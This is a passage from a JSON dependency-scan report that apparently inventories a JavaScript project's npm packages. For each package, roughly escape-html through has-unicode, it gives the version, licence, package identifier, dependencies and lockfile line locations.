"8793bbf738a44899" }, "Version": "3.2.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 8376, "EndLine": 8384 } ], "AnalyzedBy": "npm" }, { "ID": "escape-html@1.0.3", "Name": "escape-html", "Identifier": { "PURL": "pkg:npm/escape-html@1.0.3", "UID": "de9ae5bd2ce464cd" }, "Version": "1.0.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 8385, "EndLine": 8390 } ], "AnalyzedBy": "npm" }, { "ID": "escape-string-regexp@1.0.5", "Name": "escape-string-regexp", "Identifier": { "PURL": "pkg:npm/escape-string-regexp@1.0.5", "UID": "53769a8bbdbd448c" }, "Version": "1.0.5", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 539, "EndLine": 547 }, { "StartLine": 8493, "EndLine": 8502 } ], "AnalyzedBy": "npm" }, { "ID": "escape-string-regexp@2.0.0", "Name": "escape-string-regexp", "Identifier": { "PURL": "pkg:npm/escape-string-regexp@2.0.0", "UID": "54702fa43eab6ca3" }, "Version": "2.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 19988, "EndLine": 19996 } ], "AnalyzedBy": "npm" }, { "ID": "escape-string-regexp@4.0.0", "Name": "escape-string-regexp", "Identifier": { "PURL": "pkg:npm/escape-string-regexp@4.0.0", "UID": "d47f9272e2dbc3e2" }, "Version": "4.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 8391, "EndLine": 8402 } ], "AnalyzedBy": "npm" }, { "ID": "esprima@4.0.1", "Name": "esprima", "Identifier": { "PURL": "pkg:npm/esprima@4.0.1", "UID": "146718cab21ff18c" }, "Version": "4.0.1", "Licenses": [ "BSD-2-Clause" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 8918, "EndLine": 8930 } ], "AnalyzedBy": "npm" }, { "ID": "etag@1.8.1", "Name": "etag", "Identifier": { "PURL": "pkg:npm/etag@1.8.1", "UID": "dc377867e0cce19f" }, "Version": "1.8.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 8977, "EndLine": 8985 } ], "AnalyzedBy": "npm" }, { "ID": "event-target-shim@5.0.1", "Name": "event-target-shim", "Identifier": { "PURL": "pkg:npm/event-target-shim@5.0.1", "UID": "9ad7a04f77376293" }, "Version": "5.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 8986, "EndLine": 8994 } ], "AnalyzedBy": "npm" }, { "ID": "events@3.3.0", "Name": "events", "Identifier": { "PURL": "pkg:npm/events@3.3.0", "UID": "1927628ef232fb58" }, "Version": "3.3.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 8995, "EndLine": 9003 } ], "AnalyzedBy": "npm" }, { "ID": "events-universal@1.0.1", "Name": "events-universal", "Identifier": { "PURL": "pkg:npm/events-universal@1.0.1", "UID": "d054ec45646ba7c0" }, "Version": "1.0.1", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "bare-events@2.7.0" ], "Locations": [ { "StartLine": 9004, "EndLine": 9012 } ], "AnalyzedBy": "npm" }, { "ID": "execa@5.1.1", "Name": "execa", "Identifier": { "PURL": "pkg:npm/execa@5.1.1", "UID": "fd7bc0d1b5d808b0" }, "Version": "5.1.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "cross-spawn@7.0.6", "get-stream@6.0.1", "human-signals@2.1.0", "is-stream@2.0.1", "merge-stream@2.0.0", "npm-run-path@4.0.1", "onetime@5.1.2", "signal-exit@3.0.7", "strip-final-newline@2.0.0" ], "Locations": [ { "StartLine": 9013, "EndLine": 9035 } ], "AnalyzedBy": "npm" }, { "ID": "expand-template@2.0.3", "Name": "expand-template", "Identifier": { "PURL": "pkg:npm/expand-template@2.0.3", "UID": "9a012b9c90de7151" }, "Version": "2.0.3", "Licenses": [ "(MIT OR WTFPL)" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 9045, "EndLine": 9053 } ], "AnalyzedBy": "npm" }, { "ID": "exponential-backoff@3.1.2", "Name": "exponential-backoff", "Identifier": { "PURL": "pkg:npm/exponential-backoff@3.1.2", "UID": "e5bd6412cb794688" }, "Version": "3.1.2", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 9071, "EndLine": 9076 }, { "StartLine": 14321, "EndLine": 14327 } ], "AnalyzedBy": "npm" }, { "ID": "fast-base64-decode@1.0.0", "Name": "fast-base64-decode", "Identifier": { "PURL": "pkg:npm/fast-base64-decode@1.0.0", "UID": "dfb00b78303e08eb" }, "Version": "1.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 9077, "EndLine": 9082 } ], "AnalyzedBy": "npm" }, { "ID": "fast-deep-equal@3.1.3", "Name": "fast-deep-equal", "Identifier": { "PURL": "pkg:npm/fast-deep-equal@3.1.3", "UID": "81825502b7c2d676" }, "Version": "3.1.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 9083, "EndLine": 9088 } ], "AnalyzedBy": "npm" }, { "ID": "fast-fifo@1.3.2", "Name": "fast-fifo", "Identifier": { "PURL": "pkg:npm/fast-fifo@1.3.2", "UID": "a9d5e3ec4633ac3a" }, "Version": "1.3.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 9089, "EndLine": 9094 } ], "AnalyzedBy": "npm" }, { "ID": "fast-glob@3.3.3", "Name": "fast-glob", "Identifier": { "PURL": "pkg:npm/fast-glob@3.3.3", "UID": "e59121081eff05d1" }, "Version": "3.3.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@nodelib/fs.stat@2.0.5", "@nodelib/fs.walk@1.2.8", "glob-parent@5.1.2", "merge2@1.4.1", "micromatch@4.0.8" ], "Locations": [ { "StartLine": 9095, "EndLine": 9110 } ], "AnalyzedBy": "npm" }, { "ID": "fast-json-stable-stringify@2.1.0", "Name": "fast-json-stable-stringify", "Identifier": { "PURL": "pkg:npm/fast-json-stable-stringify@2.1.0", "UID": "d1d23b0ffba3e915" }, "Version": "2.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 9123, "EndLine": 9128 } ], "AnalyzedBy": "npm" }, { "ID": "fast-xml-parser@4.5.3", "Name": "fast-xml-parser", "Identifier": { "PURL": "pkg:npm/fast-xml-parser@4.5.3", "UID": "457040697ff9b71f" }, "Version": "4.5.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "strnum@1.1.2" ], "Locations": [ { "StartLine": 9136, "EndLine": 9153 } ], "AnalyzedBy": "npm" }, { "ID": "fastest-levenshtein@1.0.16", "Name": "fastest-levenshtein", "Identifier": { "PURL": "pkg:npm/fastest-levenshtein@1.0.16", "UID": "a3dceb3ed3fda8de" }, "Version": "1.0.16", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 14328, "EndLine": 14337 } ], "AnalyzedBy": "npm" }, { "ID": "fastq@1.19.1", "Name": "fastq", "Identifier": { "PURL": "pkg:npm/fastq@1.19.1", "UID": "60047bfc70570d5b" }, "Version": "1.19.1", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "reusify@1.1.0" ], "Locations": [ { "StartLine": 9154, "EndLine": 9162 } ], "AnalyzedBy": "npm" }, { "ID": "faye-websocket@0.11.4", "Name": "faye-websocket", "Identifier": { "PURL": "pkg:npm/faye-websocket@0.11.4", "UID": "839bc13998666b84" }, "Version": "0.11.4", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "websocket-driver@0.7.4" ], "Locations": [ { "StartLine": 9163, "EndLine": 9174 } ], "AnalyzedBy": "npm" }, { "ID": "fb-watchman@2.0.2", "Name": "fb-watchman", "Identifier": { "PURL": "pkg:npm/fb-watchman@2.0.2", "UID": "6765abef166bbbe9" }, "Version": "2.0.2", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "bser@2.1.1" ], "Locations": [ { "StartLine": 9175, "EndLine": 9183 } ], "AnalyzedBy": "npm" }, { "ID": "fbjs@0.8.18", "Name": "fbjs", "Identifier": { "PURL": "pkg:npm/fbjs@0.8.18", "UID": "92f7ec3a992b2131" }, "Version": "0.8.18", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "core-js@1.2.7", "isomorphic-fetch@2.2.1", "loose-envify@1.4.0", "object-assign@4.1.1", "promise@7.3.1", "setimmediate@1.0.5", "ua-parser-js@0.7.41" ], "Locations": [ { "StartLine": 9184, "EndLine": 9198 } ], "AnalyzedBy": "npm" }, { "ID": "fdir@6.5.0", "Name": "fdir", "Identifier": { "PURL": "pkg:npm/fdir@6.5.0", "UID": "c41e14fe1034808e" }, "Version": "6.5.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "picomatch@4.0.3" ], "Locations": [ { "StartLine": 15736, "EndLine": 15751 } ], "AnalyzedBy": "npm" }, { "ID": "file-uri-to-path@1.0.0", "Name": "file-uri-to-path", "Identifier": { "PURL": "pkg:npm/file-uri-to-path@1.0.0", "UID": "707265f9e5bc442c" }, "Version": "1.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 9221, "EndLine": 9227 } ], "AnalyzedBy": "npm" }, { "ID": "fill-range@7.1.1", "Name": "fill-range", "Identifier": { "PURL": "pkg:npm/fill-range@7.1.1", "UID": "7305a943c9b7ed7e" }, "Version": "7.1.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "to-regex-range@5.0.1" ], "Locations": [ { "StartLine": 9228, "EndLine": 9239 } ], "AnalyzedBy": "npm" }, { "ID": "filter-obj@1.1.0", "Name": "filter-obj", "Identifier": { "PURL": "pkg:npm/filter-obj@1.1.0", "UID": "e8a47a35b15b51b2" }, "Version": "1.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 9240, "EndLine": 9248 } ], "AnalyzedBy": "npm" }, { "ID": "finalhandler@1.1.2", "Name": "finalhandler", "Identifier": { "PURL": "pkg:npm/finalhandler@1.1.2", "UID": "a28763a95bc0e71f" }, "Version": "1.1.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "debug@2.6.9", "encodeurl@1.0.2", "escape-html@1.0.3", "on-finished@2.3.0", "parseurl@1.3.3", "statuses@1.5.0", "unpipe@1.0.0" ], "Locations": [ { "StartLine": 9249, "EndLine": 9266 } ], "AnalyzedBy": "npm" }, { "ID": "find-babel-config@2.1.2", "Name": "find-babel-config", "Identifier": { "PURL": "pkg:npm/find-babel-config@2.1.2", "UID": "68d220281a2e65e4" }, "Version": "2.1.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "json5@2.2.3" ], "Locations": [ { "StartLine": 9294, "EndLine": 9302 } ], "AnalyzedBy": "npm" }, { "ID": "find-up@3.0.0", "Name": "find-up", "Identifier": { "PURL": "pkg:npm/find-up@3.0.0", "UID": "a1bec6a69be531a" }, "Version": "3.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "locate-path@3.0.0" ], "Locations": [ { "StartLine": 16684, "EndLine": 16695 } ], "AnalyzedBy": "npm" }, { "ID": "find-up@4.1.0", "Name": "find-up", "Identifier": { "PURL": "pkg:npm/find-up@4.1.0", "UID": "97be746629fb519a" }, "Version": "4.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "locate-path@5.0.0", "path-exists@4.0.0" ], "Locations": [ { "StartLine": 3441, "EndLine": 3453 }, { "StartLine": 11947, "EndLine": 11960 }, { "StartLine": 16616, "EndLine": 16629 }, { "StartLine": 18801, "EndLine": 18813 } ], "AnalyzedBy": "npm" }, { "ID": "find-up@5.0.0", "Name": "find-up", "Identifier": { "PURL": "pkg:npm/find-up@5.0.0", "UID": "651f74b7d4dba4e1" }, "Version": "5.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "locate-path@6.0.0", "path-exists@4.0.0" ], "Locations": [ { "StartLine": 9303, "EndLine": 9318 } ], "AnalyzedBy": "npm" }, { "ID": "firebase@12.2.1", "Name": "firebase", "Identifier": { "PURL": "pkg:npm/firebase@12.2.1", "UID": "7f06a3247e30d9a1" }, "Version": "12.2.1", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@firebase/ai@2.2.1", "@firebase/analytics-compat@0.2.24", "@firebase/analytics@0.10.18", "@firebase/app-check-compat@0.4.0", "@firebase/app-check@0.11.0", "@firebase/app-compat@0.5.2", "@firebase/app-types@0.9.3", "@firebase/app@0.14.2", "@firebase/auth-compat@0.6.0", "@firebase/auth@1.11.0", "@firebase/data-connect@0.3.11", "@firebase/database-compat@2.1.0", "@firebase/database@1.1.0", "@firebase/firestore-compat@0.4.1", "@firebase/firestore@4.9.1", "@firebase/functions-compat@0.4.1", "@firebase/functions@0.13.1", "@firebase/installations-compat@0.2.19", "@firebase/installations@0.6.19", "@firebase/messaging-compat@0.2.23", "@firebase/messaging@0.12.23", "@firebase/performance-compat@0.2.22", "@firebase/performance@0.7.9", "@firebase/remote-config-compat@0.2.19", "@firebase/remote-config@0.6.6", "@firebase/storage-compat@0.4.0", "@firebase/storage@0.14.0", "@firebase/util@1.13.0" ], "Locations": [ { "StartLine": 9329, "EndLine": 9364 } ], "AnalyzedBy": "npm" }, { "ID": "flow-enums-runtime@0.0.6", "Name": "flow-enums-runtime", "Identifier": { "PURL": "pkg:npm/flow-enums-runtime@0.0.6", "UID": "78796925a3618842" }, "Version": "0.0.6", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 9387, "EndLine": 9392 } ], "AnalyzedBy": "npm" }, { "ID": "follow-redirects@1.15.11", "Name": "follow-redirects", "Identifier": { "PURL": "pkg:npm/follow-redirects@1.15.11", "UID": "7f24cc7faa596a4d" }, "Version": "1.15.11", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 9393, "EndLine": 9412 } ], "AnalyzedBy": "npm" }, { "ID": "for-each@0.3.5", "Name": "for-each", "Identifier": { "PURL": "pkg:npm/for-each@0.3.5", "UID": "645291bd7477a660" }, "Version": "0.3.5", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "is-callable@1.2.7" ], "Locations": [ { "StartLine": 9413, "EndLine": 9427 } ], "AnalyzedBy": "npm" }, { "ID": "foreground-child@3.3.1", "Name": "foreground-child", "Identifier": { "PURL": "pkg:npm/foreground-child@3.3.1", "UID": "31e4ec9dde18212e" }, "Version": "3.3.1", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "cross-spawn@7.0.6", "signal-exit@4.1.0" ], "Locations": [ { "StartLine": 9428, "EndLine": 9443 }, { "StartLine": 14338, "EndLine": 14354 } ], "AnalyzedBy": "npm" }, { "ID": "form-data@4.0.4", "Name": "form-data", "Identifier": { "PURL": "pkg:npm/form-data@4.0.4", "UID": "e0d9725464abbdec" }, "Version": "4.0.4", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "asynckit@0.4.0", "combined-stream@1.0.8", "es-set-tostringtag@2.1.0", "hasown@2.0.2", "mime-types@2.1.35" ], "Locations": [ { "StartLine": 9456, "EndLine": 9471 } ], "AnalyzedBy": "npm" }, { "ID": "fresh@0.5.2", "Name": "fresh", "Identifier": { "PURL": "pkg:npm/fresh@0.5.2", "UID": "4554a57bf4d6c3ba" }, "Version": "0.5.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 9472, "EndLine": 9480 } ], "AnalyzedBy": "npm" }, { "ID": "fs-constants@1.0.0", "Name": "fs-constants", "Identifier": { "PURL": "pkg:npm/fs-constants@1.0.0", "UID": "1bfac524859a4828" }, "Version": "1.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 9481, "EndLine": 9486 } ], "AnalyzedBy": "npm" }, { "ID": "fs-extra@11.3.2", "Name": "fs-extra", "Identifier": { "PURL": "pkg:npm/fs-extra@11.3.2", "UID": "6c78632ba66aed79" }, "Version": "11.3.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "graceful-fs@4.2.11", "jsonfile@6.2.0", "universalify@2.0.1" ], "Locations": [ { "StartLine": 17606, "EndLine": 17619 } ], "AnalyzedBy": "npm" }, { "ID": "fs-extra@7.0.1", "Name": "fs-extra", "Identifier": { "PURL": "pkg:npm/fs-extra@7.0.1", "UID": "a808b705a743d6" }, "Version": "7.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "graceful-fs@4.2.11", "jsonfile@4.0.0", "universalify@0.1.2" ], "Locations": [ { "StartLine": 17331, "EndLine": 17344 } ], "AnalyzedBy": "npm" }, { "ID": "fs-extra@8.1.0", "Name": "fs-extra", "Identifier": { "PURL": "pkg:npm/fs-extra@8.1.0", "UID": "9fa75a1d9f4ef885" }, "Version": "8.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "graceful-fs@4.2.11", "jsonfile@4.0.0", "universalify@0.1.2" ], "Locations": [ { "StartLine": 9487, "EndLine": 9501 } ], "AnalyzedBy": "npm" }, { "ID": "fs-minipass@2.1.0", "Name": "fs-minipass", "Identifier": { "PURL": "pkg:npm/fs-minipass@2.1.0", "UID": "3c19e9db9bf708cd" }, "Version": "2.1.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "minipass@3.3.6" ], "Locations": [ { "StartLine": 9502, "EndLine": 9514 } ], "AnalyzedBy": "npm" }, { "ID": "fs-minipass@3.0.3", "Name": "fs-minipass", "Identifier": { "PURL": "pkg:npm/fs-minipass@3.0.3", "UID": "3d6697ffc89af520" }, "Version": "3.0.3", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "minipass@7.1.2" ], "Locations": [ { "StartLine": 14355, "EndLine": 14367 } ], "AnalyzedBy": "npm" }, { "ID": "fs.realpath@1.0.0", "Name": "fs.realpath", "Identifier": { "PURL": "pkg:npm/fs.realpath@1.0.0", "UID": "ca3063b5b3a061bc" }, "Version": "1.0.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 9535, "EndLine": 9540 } ], "AnalyzedBy": "npm" }, { "ID": "fsevents@2.3.3", "Name": "fsevents", "Identifier": { "PURL": "pkg:npm/fsevents@2.3.3", "UID": "5d088637431dc29d" }, "Version": "2.3.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 9541, "EndLine": 9554 } ], "AnalyzedBy": "npm" }, { "ID": "function-bind@1.1.2", "Name": "function-bind", "Identifier": { "PURL": "pkg:npm/function-bind@1.1.2", "UID": "fbeed2e24996d68c" }, "Version": "1.1.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 9555, "EndLine": 9563 } ], "AnalyzedBy": "npm" }, { "ID": "gauge@2.7.4", "Name": "gauge", "Identifier": { "PURL": "pkg:npm/gauge@2.7.4", "UID": "e86339da1ef0298" }, "Version": "2.7.4", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "aproba@1.2.0", "console-control-strings@1.1.0", "has-unicode@2.0.1", "object-assign@4.1.1", "signal-exit@3.0.7", "string-width@1.0.2", "strip-ansi@3.0.1", "wide-align@1.1.5" ], "Locations": [ { "StartLine": 17345, "EndLine": 17361 } ], "AnalyzedBy": "npm" }, { "ID": "gauge@4.0.4", "Name": "gauge", "Identifier": { "PURL": "pkg:npm/gauge@4.0.4", "UID": "6f6ac98d53a4064d" }, "Version": "4.0.4", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "aproba@1.2.0", "color-support@1.1.3", "console-control-strings@1.1.0", "has-unicode@2.0.1", "signal-exit@3.0.7", "string-width@4.2.3", "strip-ansi@6.0.1", "wide-align@1.1.5" ], "Locations": [ { "StartLine": 9595, "EndLine": 9615 } ], "AnalyzedBy": "npm" }, { "ID": "generator-function@2.0.1", "Name": "generator-function", "Identifier": { "PURL": "pkg:npm/generator-function@2.0.1", "UID": "24536271da375f31" }, "Version": "2.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 9616, "EndLine": 9624 } ], "AnalyzedBy": "npm" }, { "ID": "gensync@1.0.0-beta.2", "Name": "gensync", "Identifier": { "PURL": "pkg:npm/gensync@1.0.0-beta.2", "UID": "876caab0a123c17" }, "Version": "1.0.0-beta.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 9625, "EndLine": 9633 } ], "AnalyzedBy": "npm" }, { "ID": "get-caller-file@2.0.5", "Name": "get-caller-file", "Identifier": { "PURL": "pkg:npm/get-caller-file@2.0.5", "UID": "6f58b9fd1e968fc3" }, "Version": "2.0.5", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 9634, "EndLine": 9642 } ], "AnalyzedBy": "npm" }, { "ID": "get-intrinsic@1.3.0", "Name": "get-intrinsic", "Identifier": { "PURL": "pkg:npm/get-intrinsic@1.3.0", "UID": "94dcf3c9b1085a16" }, "Version": "1.3.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "call-bind-apply-helpers@1.0.2", "es-define-property@1.0.1", "es-errors@1.3.0", "es-object-atoms@1.1.1", "function-bind@1.1.2", "get-proto@1.0.1", "gopd@1.2.0", "has-symbols@1.1.0", "hasown@2.0.2", "math-intrinsics@1.1.0" ], "Locations": [ { "StartLine": 9643, "EndLine": 9666 } ], "AnalyzedBy": "npm" }, { "ID": "get-package-type@0.1.0", "Name": "get-package-type", "Identifier": { "PURL": "pkg:npm/get-package-type@0.1.0", "UID": "42c951050af2f5ee" }, "Version": "0.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 9667, "EndLine": 9675 } ], "AnalyzedBy": "npm" }, { "ID": "get-proto@1.0.1", "Name": "get-proto", "Identifier": { "PURL": "pkg:npm/get-proto@1.0.1", "UID": "8cc9c0f81c8f1bea" }, "Version": "1.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "dunder-proto@1.0.1", "es-object-atoms@1.1.1" ], "Locations": [ { "StartLine": 9676, "EndLine": 9688 } ], "AnalyzedBy": "npm" }, { "ID": "get-stream@6.0.1", "Name": "get-stream", "Identifier": { "PURL": "pkg:npm/get-stream@6.0.1", "UID": "22b39c2a84d3626e" }, "Version": "6.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 9689, "EndLine": 9700 } ], "AnalyzedBy": "npm" }, { "ID": "getenv@2.0.0", "Name": "getenv", "Identifier": { "PURL": "pkg:npm/getenv@2.0.0", "UID": "eca0e77ba2246a0b" }, "Version": "2.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 9719, "EndLine": 9727 } ], "AnalyzedBy": "npm" }, { "ID": "github-from-package@0.0.0", "Name": "github-from-package", "Identifier": { "PURL": "pkg:npm/github-from-package@0.0.0", "UID": "2adcad7e983324e3" }, "Version": "0.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 9728, "EndLine": 9733 } ], "AnalyzedBy": "npm" }, { "ID": "glob@10.4.5", "Name": "glob", "Identifier": { "PURL": "pkg:npm/glob@10.4.5", "UID": "9116516bc1102054" }, "Version": "10.4.5", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "foreground-child@3.3.1", "jackspeak@3.4.3", "minimatch@9.0.5", "minipass@7.1.2", "package-json-from-dist@1.0.1", "path-scurry@1.11.1" ], "Locations": [ { "StartLine": 2329, "EndLine": 2348 }, { "StartLine": 15018, "EndLine": 15036 }, { "StartLine": 17506, "EndLine": 17525 } ], "AnalyzedBy": "npm" }, { "ID": "glob@11.0.3", "Name": "glob", "Identifier": { "PURL": "pkg:npm/glob@11.0.3", "UID": "fc64b08e36648e84" }, "Version": "11.0.3", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "foreground-child@3.3.1", "jackspeak@4.1.1", "minimatch@10.0.3", "minipass@7.1.2", "package-json-from-dist@1.0.1", "path-scurry@2.0.0" ], "Locations": [ { "StartLine": 14368, "EndLine": 14389 } ], "AnalyzedBy": "npm" }, { "ID": "glob@7.2.3", "Name": "glob", "Identifier": { "PURL": "pkg:npm/glob@7.2.3", "UID": "d77cb6c2f8bc2013" }, "Version": "7.2.3", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "fs.realpath@1.0.0", "inflight@1.0.6", "inherits@2.0.4", "minimatch@3.1.2", "once@1.4.0", "path-is-absolute@1.0.1" ], "Locations": [ { "StartLine": 9734, "EndLine": 9754 } ], "AnalyzedBy": "npm" }, { "ID": "glob@9.3.5", "Name": "glob", "Identifier": { "PURL": "pkg:npm/glob@9.3.5", "UID": "841e30a3b5be947f" }, "Version": "9.3.5", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "fs.realpath@1.0.0", "minimatch@8.0.7", "minipass@4.2.8", "path-scurry@1.11.1" ], "Locations": [ { "StartLine": 6335, "EndLine": 6353 } ], "AnalyzedBy": "npm" }, { "ID": "glob-parent@5.1.2", "Name": "glob-parent", "Identifier": { "PURL": "pkg:npm/glob-parent@5.1.2", "UID": "2d24535c3d23d170" }, "Version": "5.1.2", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "is-glob@4.0.3" ], "Locations": [ { "StartLine": 9111, "EndLine": 9122 } ], "AnalyzedBy": "npm" }, { "ID": "gopd@1.2.0", "Name": "gopd", "Identifier": { "PURL": "pkg:npm/gopd@1.2.0", "UID": "6536622b9bb6f8ae" }, "Version": "1.2.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 9844, "EndLine": 9855 } ], "AnalyzedBy": "npm" }, { "ID": "graceful-fs@4.2.11", "Name": "graceful-fs", "Identifier": { "PURL": "pkg:npm/graceful-fs@4.2.11", "UID": "247ff93ce90375b3" }, "Version": "4.2.11", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 9856, "EndLine": 9861 }, { "StartLine": 14390, "EndLine": 14396 } ], "AnalyzedBy": "npm" }, { "ID": "hard-rejection@2.1.0", "Name": "hard-rejection", "Identifier": { "PURL": "pkg:npm/hard-rejection@2.1.0", "UID": "a6404938613a270e" }, "Version": "2.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 9869, "EndLine": 9877 } ], "AnalyzedBy": "npm" }, { "ID": "has-flag@3.0.0", "Name": "has-flag", "Identifier": { "PURL": "pkg:npm/has-flag@3.0.0", "UID": "97202381621a24dc" }, "Version": "3.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 548, "EndLine": 556 } ], "AnalyzedBy": "npm" }, { "ID": "has-flag@4.0.0", "Name": "has-flag", "Identifier": { "PURL": "pkg:npm/has-flag@4.0.0", "UID": "9c9a0d9099b6ec02" }, "Version": "4.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 9891, "EndLine": 9899 } ], "AnalyzedBy": "npm" }, { "ID": "has-property-descriptors@1.0.2", "Name": "has-property-descriptors", "Identifier": { "PURL": "pkg:npm/has-property-descriptors@1.0.2", "UID": "55652609e3be678a" }, "Version": "1.0.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "es-define-property@1.0.1" ], "Locations": [ { "StartLine": 9900, "EndLine": 9911 } ], "AnalyzedBy": "npm" }, { "ID": "has-symbols@1.1.0", "Name": "has-symbols", "Identifier": { "PURL": "pkg:npm/has-symbols@1.1.0", "UID": "2c05e9e11550d1f6" }, "Version": "1.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 9928, "EndLine": 9939 } ], "AnalyzedBy": "npm" }, { "ID": "has-tostringtag@1.0.2", "Name": "has-tostringtag", "Identifier": { "PURL": "pkg:npm/has-tostringtag@1.0.2", "UID": "8823f0590abd420e" }, "Version": "1.0.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "has-symbols@1.1.0" ], "Locations": [ { "StartLine": 9940, "EndLine": 9954 } ], "AnalyzedBy": "npm" }, { "ID": "has-unicode@2.0.1", "Name": "has-unicode", 